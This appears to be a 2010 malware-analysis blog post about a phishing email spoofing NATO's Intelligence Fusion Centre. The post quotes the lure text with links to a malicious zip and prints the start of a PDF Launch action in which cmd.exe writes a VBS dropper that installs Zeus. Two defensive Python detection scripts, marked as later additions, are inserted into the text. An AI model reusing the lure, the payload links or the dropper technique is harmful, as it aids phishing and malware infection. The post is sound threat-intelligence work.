Update: Please read the detailed analysis of this and associated attacks:
Crime or Espionage? by Nart Villeneuve
Intelligence Fusion Centre
In support of NATO
RAF Molesworth, United Kingdom
Unit 8845 Box 300, Huntingdon
CAMBS PE28 0QB
FROM: Intelligence Fusion Centre
SUBJECT: Military operation of the EU
Additional information can be found in the following report:
http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.ip
> EUROPEAN UNION
> EUROPEAN SECURITY AND DEFENCE POLICY
> Military operation of the EU
> EU NAVFOR Somalia
>
> This military operation, called EU NAVFOR Somalia - operation
> "Atalanta", is launched in support of Resolutions 1814 (2008), 1816
> (2008), 1838 (2008) and 1846 (2008) of the United Nations Security Council (UNSC) in order to contribute to:
> - the protection of vessels of the WFP (World Food Programme) delivering food aid to displaced
> persons in Somalia;
> - the protection of vulnerable vessels cruising off the Somali coast, and the deterrence, prevention
> and repression of acts of piracy and armed robbery off the Somali coast.
> This operation, which is the first EU maritime operation, is conducted
> in the framework of the European Security and Defence Policy (ESDP).
>
>
> More information and background documents available on
> http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
> and
> http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN. zip
>
> ________________________________________
> PRESS - EU Council Secretariat Tel: +32 (0)2 281 7640 / 6319
Headers
X-VirusChecked: Checked
X-Env-Sender: gnarusm@mail.thecopperstar.com
X-Msg-Ref: xxxxxxxxxxx
X-StarScan-Version: 6.2.4; banners=-,-,-
X-Originating-IP: [174.132.255.10]
X-SpamReason: No, hits=1.0 required=7.0 tests=BODY_RANDOMQ
Received: (qmail 15068 invoked from network); 26 Aug 2010 13:24:33 -0000
Received: from a.ff.84ae.static.theplanet.com (HELO mail.thecopperstar.com)
(174.132.255.10) by xxxxxxxxxx
DHE-RSA-AES256-SHA encrypted SMTP; 26 Aug 2010 13:24:33 -0000
Received: from gnarusm by mail.thecopperstar.com with local (Exim 4.69)
(envelope-from <gnarusm@mail.thecopperstar.
XXXXXXXXXX; Thu, 26 Aug 2010 08:24:30 -0500
To: XXXXXXXXX
Subject: From Intelligence Fusion Centre to XXXXXXX
From: <ifc@ifc.nato.int>
Message-ID: <E1OocRS-0006Y5-PR@mail.
Date: Thu, 26 Aug 2010 08:24:30 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mail.thecopperstar.com
174.132.255.10
Hostname: a.ff.84ae.static.theplanet.com
ISP: THEPLANET.COM INTERNET SERVICES
Organization: THEPLANET.COM INTERNET SERVICES
Type: Broadband
Assignment: Static IP
Country: United States
State/Region: Texas
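The headers above are the whole story: the display From: claims ifc@ifc.nato.int, but the envelope sender, the Exim "with local" hop and the connecting IP all belong to mail.thecopperstar.com. As an added example (not code from the original post), this check automates that comparison on a constructed copy of those headers; the recipient, receiving MX and queue id that the page redacts are placeholders.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample modelled on the headers shown above; the recipient,
# receiving MX and queue id that the page redacts are placeholders.
SAMPLE_HEADERS = """\
X-Env-Sender: gnarusm@mail.thecopperstar.com
X-Originating-IP: [174.132.255.10]
Received: from a.ff.84ae.static.theplanet.com (HELO mail.thecopperstar.com)
 (174.132.255.10) by mx.example.invalid with DHE-RSA-AES256-SHA encrypted SMTP;
 26 Aug 2010 13:24:33 -0000
Received: from gnarusm by mail.thecopperstar.com with local (Exim 4.69)
 (envelope-from <gnarusm@mail.thecopperstar.com>) id PLACEHOLDER;
 Thu, 26 Aug 2010 08:24:30 -0500
To: recipient@example.invalid
Subject: From Intelligence Fusion Centre to recipient
From: <ifc@ifc.nato.int>
Date: Thu, 26 Aug 2010 08:24:30 -0500
"""
IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
LOCAL_HOP = re.compile(r"from (\S+) by (\S+) with local")


def domain_of(header_value):
    """Domain of the first address in a header value, lower-cased."""
    return parseaddr(header_value)[1].rpartition("@")[2].lower()


def same_org(a, b):
    """True when one domain equals or is a subdomain of the other."""
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def analyse_headers(raw):
    """Compare the display From: with the envelope sender and the Received
    chain; a mismatch is the classic sign of a spoofed sender."""
    msg = message_from_string(raw)
    from_dom = domain_of(msg.get("From", ""))
    env_dom = domain_of(msg.get("X-Env-Sender", ""))
    findings = {"from_domain": from_dom, "envelope_domain": env_dom,
                "hop_ips": [], "local_injection": None,
                "spoof_suspected": not same_org(from_dom, env_dom)}
    for hop in msg.get_all("Received") or []:
        findings["hop_ips"].extend(IPV4.findall(hop))
        m = LOCAL_HOP.search(hop)
        if m:  # Exim "with local": submitted by a user on that host, not relayed
            findings["local_injection"] = {"user": m.group(1), "host": m.group(2)}
    return findings
```

The hop IPs can then be fed to the same kind of lookup shown above for 174.132.255.10.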
http://www.virustotal.com/file-scan/report.html?id=5761e303d7bc027df47b5b01a3e4e8e186eb36d3a4f40956768231ef3bbcac46-1282832496
Submission date: 2010-08-26 14:21:36 (UTC)
Current status: finished
Result: 11 /41 (26.8%)
Avast 4.8.1351.0 2010.08.26 PDF:Risk-A
Avast5 5.0.594.0 2010.08.26 PDF:Risk-A
BitDefender 7.2 2010.08.26 Exploit.PDF-Dropper.Gen
eSafe 7.0.17.0 2010.08.26 PDF.DropperExploit.Gen
eTrust-Vet 36.1.7818 2010.08.26 PDF/Pidief.RU
F-Secure 9.0.15370.0 2010.08.26 Exploit.PDF-Dropper.Gen
GData 21 2010.08.26 Exploit.PDF-Dropper.Gen
Kaspersky 7.0.0.125 2010.08.26 Trojan-Dropper.VBS.Pdfka.b
nProtect 2010-08-26.01 2010.08.26 Exploit.PDF-Dropper.Gen
PCTools 7.0.3.5 2010.08.26 Trojan.Dropper
SUPERAntiSpyware 4.40.0.1006 2010.08.26 -
Symantec 20101.1.1.7 2010.08.26 Trojan.Dropper
MD5 : 8b3a3c4386e4d59c6665762f53e6ec8e
/Type /Action
/S /Launch
/Win /F (cmd.exe)
/P (
/c echo Dim BinaryStream > vbs1.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream")
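The Launch action above is what makes the PDF dangerous: no parser exploit, just cmd.exe echoing a VBS dropper to disk. As an added example (not code from the original post), this triage script finds /Launch actions in raw PDF text, decodes the /F and /P literal strings (nested parentheses and backslash escapes included), and reports the markers a quarantine rule would key on. The embedded PDF is constructed to mirror the object above, cut where the page's excerpt stops; the marker list is my choice. It does not inflate compressed object streams.

```python
import re

# Constructed minimal PDF modelled on the Launch action quoted above; the /P
# payload stops where the page's excerpt stops. Not the original sample.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
4 0 obj << /Type /Action /S /Launch /Win << /F (cmd.exe)
/P (/c echo Dim BinaryStream > vbs1.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream")) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""
LAUNCH = re.compile(rb"/S\s*/Launch\b")
KEY = re.compile(rb"/(F|P)\s*\(")
SUSPICIOUS = ("cmd.exe", "echo ", ".vbs", "adodb.stream", "cscript", "wscript")


def read_literal(data, start):
    """Decode the PDF literal string whose '(' is at data[start], honouring
    nested balanced parentheses and backslash escapes."""
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":                 # escaped byte: copy it verbatim
            out += data[i + 1:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                return out.decode("latin-1"), i + 1
        if depth > 1 or (depth == 1 and c != b"("):
            out += c
        i += 1
    raise ValueError("unterminated literal string")


def find_launch_actions(data):
    """One dict per /Launch action in uncompressed PDF text (objects inside
    compressed object streams must be inflated first)."""
    hits = []
    for m in LAUNCH.finditer(data):
        obj = data[m.end():m.end() + 4096].split(b"endobj", 1)[0]
        fields, pos = {}, 0
        while (k := KEY.search(obj, pos)):
            value, pos = read_literal(obj, k.end() - 1)
            fields.setdefault(k.group(1).decode(), value)
        blob = " ".join(fields.values()).lower()
        hits.append({"file": fields.get("F"), "params": fields.get("P"),
                     "markers": [s for s in SUSPICIOUS if s in blob]})
    return hits
```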
 -------------------------------------------------
Windows XP SP2, Adobe Reader 9.1
A quick flash of a black cmd.exe window, and we are looking at a pretty new icon on the desktop: exe.exe.
Files created
c:\windows\system32\ntos.exe 28C4648F05F46A3EC37D664CEE0D84A8
exe.exe (same directory as the original file) 5fb94eef8bd57fe8e20ccc56e33570c5
These are the classic signs of old Zeus, and that is what it is.
File name: exe.exe
http://www.virustotal.com/file-scan/report.html?id=33ac66e78d410d03f5644fb1569ea7d28e823561e00b86593d9022f554127c7e-1282847843
Result: 3 /41 (7.3%)
AntiVir 8.2.4.46 2010.08.26 TR/Crypt.XPACK.Gen2
PCTools 7.0.3.5 2010.08.26 Trojan.Zbot
Symantec 20101.1.1.7 2010.08.26 Trojan.Zbot
MD5 : 5fb94eef8bd57fe8e20ccc56e33570c5
File name: ntos.exe
http://www.virustotal.com/file-scan/report.html?id=c61fdc96fb7861396d7aa99a26cb6dff3f92aeeccf93d212a8fa3e166adec6aa-1282850806
Submission date: 2010-08-26 19:26:46 (UTC)
Result: 4 /39 (10.3%)
AntiVir 8.2.4.46 2010.08.26 TR/Crypt.XPACK.Gen2
Panda 10.0.2.7 2010.08.26 Suspicious file
PCTools 7.0.3.5 2010.08.26 Trojan.Zbot
Symantec 20101.1.1.7 2010.08.26 Trojan.Zbot
MD5 : 28c4648f05f46a3ec37d664cee0d84a8
 

 